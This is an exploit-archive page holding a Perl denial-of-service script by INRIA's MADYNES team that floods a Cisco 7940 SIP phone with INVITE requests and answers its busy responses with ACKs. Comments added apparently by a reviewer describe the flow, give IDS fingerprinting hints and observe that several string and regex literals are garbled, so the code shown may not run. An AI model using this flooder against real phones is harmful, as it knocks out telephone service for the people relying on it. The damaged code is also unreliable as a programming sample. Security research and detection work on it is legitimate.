
# Title : Cisco Phone 7940 Remote Denial of Service Exploit
# Published : 2007-12-05
# Author : MADYNES
# Previous Title : Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit
# Next Title : VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC


#!/usr/bin/perl
 

###############################
# Vulnerability discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# http://madynes.loria.fr
############################### 
use IO::Socket::INET;
use String::Random; 
# SIP INVITE flooder aimed at a single endpoint, driven from the command line.
# Flow as visible below: build an INVITE carrying a fresh random Call-ID, send
# it over UDP/5060, read one response, and branch on its status line
# (100 -> remember the call and pause one second; 486 -> ACK the outstanding
# calls). The outer loop has no exit condition of its own: `$flag` is never
# changed in this block, so the script runs until it is killed or a socket
# call fails.
#
# Defender notes: on the wire this is a steady stream of INVITEs from one
# source to UDP/5060 in which the Via branch (`z9hG4bK1`), the From tag
# (`tag=1`) and the local source port (5060) never vary while the Call-ID
# does; a SIP-aware IDS, SBC or rate limiter can alert on or throttle that
# pattern, and the fixed branch/tag values make it easy to fingerprint.
# NOTE(review): the script runs without `use strict`/`use warnings`, and
# several literals as reproduced on this page appear garbled (the bare `r`
# tokens in the message bodies and the unescaped `/` inside the status-line
# matches), so the text shown here may not compile as-is; read it as a
# sample of the traffic pattern rather than as a working program.
die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
unless ($ARGV[3]); # all four positional arguments required (only the last is checked)
# Positional arguments; note the order of assignment differs from argv order.
$targetUser = $ARGV[1];
$targetIP = $ARGV[0]; 
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2]; 
# UDP socket towards the target's SIP port, also bound locally to port 5060.
# Indirect-object `new IO::Socket::INET` is combined with an arrow `->new(...)`
# call; the result is never checked for failure before use.
$socket=new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>$targetIP,
LocalPort=>5060); 
$foo = new String::Random; # random-string generator used for Call-ID and CSeq
$flag = 0; # loop guard; nothing in this block ever sets it to a non-zero value
@calls; # bare array in void context: this statement has no effect
$threads = 0; # NOTE: the loop below reads `$thread` (no trailing `s`), a different variable
while ($flag == 0){
# Random Call-ID with the attacker's address as its host part; CSeq comes
# from String::Random as well (presumably meant to be digits; not verified here).
$callid= " " . $foo->randpattern("CCCnccnC") ."@$attackerIP";
$cseq = $foo->randregex('dddd'); 
# INVITE request text, interpolated from the arguments and the random values above.
$msg = "INVITE sip:$targetIP SIP/2.0r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1r
From: <sip:$attackerUser@$attackerIP>;tag=1r
To: <sip:$targetUser@$targetIP>r
Call-ID:$callidr
CSeq: $cseq INVITEr
Max-Forwards: 70r
Contact: <sip:$attackerUser@$attackerIP>r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
MESSAGEr
Content-Length: 0r
r
";
$socket->send($msg); 
$socket->recv($text,1024,0); # blocking read of one response, at most 1024 bytes
# Provisional (100) response: keep the Call-ID as pending and wait a second
# before the next INVITE.
if ($text =~ /^SIP/2.0 100(.rn)*/ ){
push(@calls, $callid);
sleep(1);
# Busy (486) response: acknowledge pending calls until the pending count
# falls below the count frozen at the first 486.
}elsif ($text =~ /^SIP/2.0 486(.rn)*/ ){
if ($thread == 0){
$thread = scalar(@calls); # first 486 seen: record the current pending count as threshold
}
while (scalar(@calls) ge $thread){ # `ge` compares as strings, not numerically
# Three copies of the response, each reduced by substitution to one header
# value: the To-header parameters (tag), the Call-ID, and the CSeq number.
# As reproduced here the replacement parts are the literals `4` and `2`.
$toTag = $cseq= $callid= $text;
$toTag =~ s/^(.*rn)*(To|t):(.*?>)(;.*?)?rn(.*rn)*/4/;

$callid =~ s/^(.*rn)*Call-ID:(.*)rn(.*rn)*/2/;
$cseq =~ s/^(.*rn)*CSeq: (.*?) (.*?)rn(.*rn)*/2/; 
# ACK for that dialog, echoing the extracted To tag, Call-ID and CSeq.
$msg = "ACK sip:$targetIP SIP/2.0r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1r
From: <sip:$attackerUser@$attackerIP>;tag=1r
To: <sip:$targetUser@$targetIP>$toTagr
Call-ID:$callidr
CSeq: $cseq ACKr
Contact: <sip:$attackerUser@$attackerIP>r
Content-Length: 0r
r
";
$socket->send($msg);
# Drop the acknowledged Call-ID from the pending list. `delete` on an array
# element leaves an undef slot unless it is the last element, so the count
# tested by the enclosing `while` only shrinks when the tail is removed;
# the index is not advanced on a match, so an undef slot is skipped on the
# next pass.
$i= 0;
while ($i < scalar(@calls)){
if (@calls[$i] eq $callid){
delete @calls[$i];
}else{
$i += 1;
}
}
# Still at or above the threshold: read the next response and ACK it too.
if (scalar(@calls) ge $thread){
$socket->recv($text,1024,0);
}
}
}
}
